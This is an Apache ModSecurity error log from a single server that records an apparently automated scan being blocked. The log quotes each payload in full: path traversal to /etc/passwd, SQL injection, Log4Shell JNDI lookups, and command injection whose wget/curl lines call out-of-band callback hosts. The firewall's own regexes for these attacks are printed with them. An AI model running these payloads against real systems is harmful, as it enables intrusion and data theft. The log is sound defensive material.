[Tue Aug 29 11:31:06.360876 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAP@MwQAAAAZ"]
[Tue Aug 29 11:31:07.312691 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgoo6p9j9wdeunb.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQMroIAAAAu"]
[Tue Aug 29 11:31:08.311519 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAP9HggAAAAW"]
[Tue Aug 29 11:31:09.100438 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg86up8xuajb6dc.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAPahwkAAAAL"]
[Tue Aug 29 11:31:10.339860 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlg56q48bujiyhup.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPahwwAAAAL"]
[Tue Aug 29 11:31:10.362347 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAPOheMAAAAa"]
[Tue Aug 29 11:31:10.391025 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAPahw0AAAAL"]
[Tue Aug 29 11:31:11.303798 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPahw4AAAAL"]
[Tue Aug 29 11:31:11.979556 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg6obw6ziex74dq.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAANjpzwAAAAT"]
[Tue Aug 29 11:31:13.302399 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAQMro8AAAAu"]
[Tue Aug 29 11:31:13.316874 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgb1bou6m4qf7dh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAPPS1QAAAAd"]
[Tue Aug 29 11:31:13.434731 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAPLwEIAAAAX"]
[Tue Aug 29 11:31:14.335029 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAPLwEMAAAAX"]
[Tue Aug 29 11:31:14.336987 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQDFSMAAAAl"]
[Tue Aug 29 11:31:15.440171 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAPDn5QAAAAP"]
[Tue Aug 29 11:31:16.688674 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQSWKgAAAA0"]
[Tue Aug 29 11:31:17.319364 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQJWrMAAAAr"]
[Tue Aug 29 11:31:17.325181 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQUH@IAAAA2"]
[Tue Aug 29 11:31:17.347833 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAPPS1sAAAAd"]
[Tue Aug 29 11:31:18.325850 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQDFScAAAAl"]
[Tue Aug 29 11:31:18.380805 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgzhpokmz716den.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAN@5DwAAAAO"]
[Tue Aug 29 11:31:20.344304 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQEGHYAAAAm"]
[Tue Aug 29 11:31:22.496874 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "digilibft.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAP5mIIAAAAM"]
[Tue Aug 29 11:31:23.325092 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQMrqAAAAAu"]
[Tue Aug 29 11:31:24.659933 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlg9psc1ggmje78s.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQFcR0AAAAn"]
[Tue Aug 29 11:31:25.317411 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgy6qdr13skaqpy.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQEGH8AAAAm"]
[Tue Aug 29 11:31:26.704552 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgq18oe1s3b7t61.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAPRNhMAAAAf"]
[Tue Aug 29 11:31:27.345564 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQOv14AAAAw"]
[Tue Aug 29 11:31:28.313436 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAN@5FUAAAAO"]
[Tue Aug 29 11:31:29.307499 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAN@5FgAAAAO"]
[Tue Aug 29 11:31:29.428270 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQNwGUAAAAv"]
